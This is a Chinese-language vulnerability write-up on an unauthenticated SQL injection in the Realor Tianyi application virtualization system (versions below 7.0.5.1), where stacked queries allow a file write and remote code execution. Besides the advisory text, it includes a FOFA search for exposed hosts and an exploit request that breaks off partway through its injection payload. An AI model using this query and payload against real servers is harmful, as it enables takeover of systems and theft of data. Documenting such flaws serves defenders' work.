0x01 产品简介

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权，基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在瑞友天翼服务器(群)上，客户端通过WEB即可快速安全的访问经服务器上授权的应用软件，实现集中应用、远程接入、协同办公等，从而为用户打造集中、便捷、安全、高效的虚拟化支撑平台。

0x02 漏洞概述

瑞友天翼应用虚拟化系统中的 \Home\Controller\AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口，攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。

漏洞成因

该漏洞是由于系统未对用户的输入进行有效的过滤，直接将其拼接进SQL查询语句中，导致出现了SQL注入漏洞。

漏洞影响

该漏洞的成功利用可利用SQL注入写入恶意文件获取操作系统权限，最严重的情况下，这可能导致服务器的完全接管，敏感数据泄露，甚至将服务器转化为发起其他攻击的跳板。

0x03 影响范围

version < 7.0.5.1

0x04 复现环境

FOFA：app="REALOR-天翼应用虚拟化系统"

0x05 漏洞复现

Exp

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%